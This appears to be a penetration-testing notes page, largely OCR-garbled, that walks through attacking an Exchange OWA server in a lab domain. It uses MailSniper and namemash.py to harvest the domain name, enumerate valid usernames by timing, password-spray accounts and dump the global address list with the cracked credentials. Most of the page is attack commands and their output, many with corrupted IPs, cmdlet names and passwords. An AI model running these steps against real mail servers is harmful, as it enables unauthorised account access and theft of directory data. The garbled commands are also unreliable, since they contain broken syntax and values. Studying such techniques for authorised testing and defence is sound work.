Attacking OWA

We're going to assume that we identified their OWA Exchange service at 10.10.15.100 during our external recon

Password Spraying:

Password spraying is an effective technique for discovering weak passwords that users are notorious for using. Patterns such as MonthYear (August2019), SeasonYear (Summer2019) and DayDate (Tuesday6) are very common.

Two excellent tools for password spraying against Office 365 and Exchange are MailSniper and SprayingToolkit

LogoGitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub
MaiiSniper
LogoGitHub - byt3bl33d3r/SprayingToolkit: Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficientGitHub
PS C:\> ipmo C:\Tools\MailSniper\MailSniper.ps1

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

PS C:\> Invoke-DomainHarvestOWA -ExchHostname 1€.10.15.100
[*] Harvesting domain name from the server at 10.10.15.100
The domain appears to be: CYBER or cyberbotic.io

Next, we need to find valid usernames from the list of users enumerated

root@kali:~# cat names.txt
Bob Farmer
Isabel Yates
BTN TS
Joyce Adams
Uisng namesmash.py
root@kali:~# /opt/namemash.py names.txt >> possible-usernames.txt
root@kali:~# head -n 5 possible-usernames.txt
bobfarmer
farmerbob
bob.farmer
farmer.bob
Rl Gl

Invoke-UsernameHarvestOHA uses a timing attack to validate which (f any) of these usernames are valid.

PS C:\> Invoke-UsernamearvestOWA -ExchHostname 10.10.15.100 -Domain CYBER -Userlist .\possible-usernames. txt -Outfile valid. txt

This output shows one valid result for CYBER\iyates.

You can run this again and target -Domain DEV, which will also find valid results for:

• DEV\bfarmer

• DEV\jking

• DEV\jadams

This requires a little bit of explaining. cyberbotic.io is the root of the Active Directory forest, who's NetBIOS name is CYBER.

But cyberbotic.io has a child domain called dev.cyberbotic.io, who's NetBIOS name is DEV. From this, we can ascertain that iyates is a user in the parent domain; whilst bfarmer, jking and jadams exist in the child domain.

However, without just guessing at domain names, we don't have a reliable way of knowing DEV ever existed. You may be able to find some clues from your OSINT such as leaked internal domain names.

MailSniper can spray passwords against the valid account(s) identified using, Outlook Web Access (OWA), Exchange Web Services (EWS) and Exchange ActiveSync (EAS).

95 C:\> Invoke-PassuordsprayOHA ~Exchiastnane 10.10.15.100 -Userlist .\valid. txt -Password Sumer2021
[¥] Now spraying the 4N portal at https://10.10.15.100/ona/

[¥] SUCCESSI User:CYBER\lyates Password: Summer2021

R IR e A )

We can do further actions using mailSniper with valid Credentials.

PS C:\> Get-GlobalAddressList ~Exchostnane 19.10.15.100 -UserName CYBER\iyates -Password Susmer2021 -OutFile gal.txt
PreviousPostgresqlNextReffernces

Last updated